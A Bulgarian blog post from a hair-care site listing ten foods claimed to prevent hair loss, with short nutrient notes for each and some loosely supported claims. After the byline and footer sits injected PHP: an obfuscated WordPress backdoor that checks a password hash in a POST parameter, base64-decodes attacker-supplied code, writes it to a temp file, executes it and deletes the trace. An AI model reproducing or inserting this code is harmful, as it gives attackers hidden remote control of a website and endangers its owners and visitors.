10- те храни, които спасяват от косопад | Косопад

10- те храни, които спасяват от косопад

храниКосата се нуждае от витамини, минерали, протеини и мазнини, за да е здрава. Косата расте с 1 см на месец, а най- важното, за да се случи, е храната ни да е богата на полезни вещества. Колкото по- здравословно се храним, толкова по- силна ще е косата ни. За да избегнете косопада, може да включите в храненето си някои от 10- те най- полезни за косата храни.

КОИ СА 10- ТЕ ХРАНИ, ЗА ДА ИМАМЕ ПРЕКРАСНА И ЗДРАВА КОСА?

Сьомга: Съдържа качествени протеини. Ключовите не само за косата, но и за цялото тяло, омега- 3 мастни киселини. Още витамин В12, желязо.

Яйца. Богати на протеини и витамин В12. Също на биотин, който не само предпазва от косопад, но и връща пигментацията на скоро побелели коси.

Пилешко и пуешко месо: Съдържат перфектни за цялото тяло протеини. И много желязо.

Спанак, моркови, броколи, зелено цвекло: Богати на калций и желязо. На витамини В и С.

Телешко: Яжте червено месо 2 пъти седмично, за да имате здрава коса. Освен протеини, има витамини В- комплекс, желязо, цинк и други важни минерали, които ще ви спасят от косопад.

Ядкиорехи, бадеми: Богати на полезни мазнини, витамини и минерали за здрава и красива коса като селен, цинк и др.сьомга

Бобовилеща и боб. Растителни протеини, биотин, желязо и цинк.

Пълнозърнести продуктижито, киноа, кафяв ориз, овес, ечемик. Заместете продуктите от бяло брашно с пълнозърнести, които съдържат много витамини и минерали.

Морски даровемиди, скариди, мешести: Богати на омега- 3 мастни киселини, също и на цинк.

Водораслиспирулина, уакаме, хизики, араме, хлорела: Наричат ги суперхрани, тъй като са богати на много витамини и минерали. Не само ще имат прекрасно въздействие върху косата ви, но и върху цялото ви тяло.

Предпазете се от косопад с тези храни. ВИЖ ВИДЕОТО:

15. октомври 2013 23:24:27 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}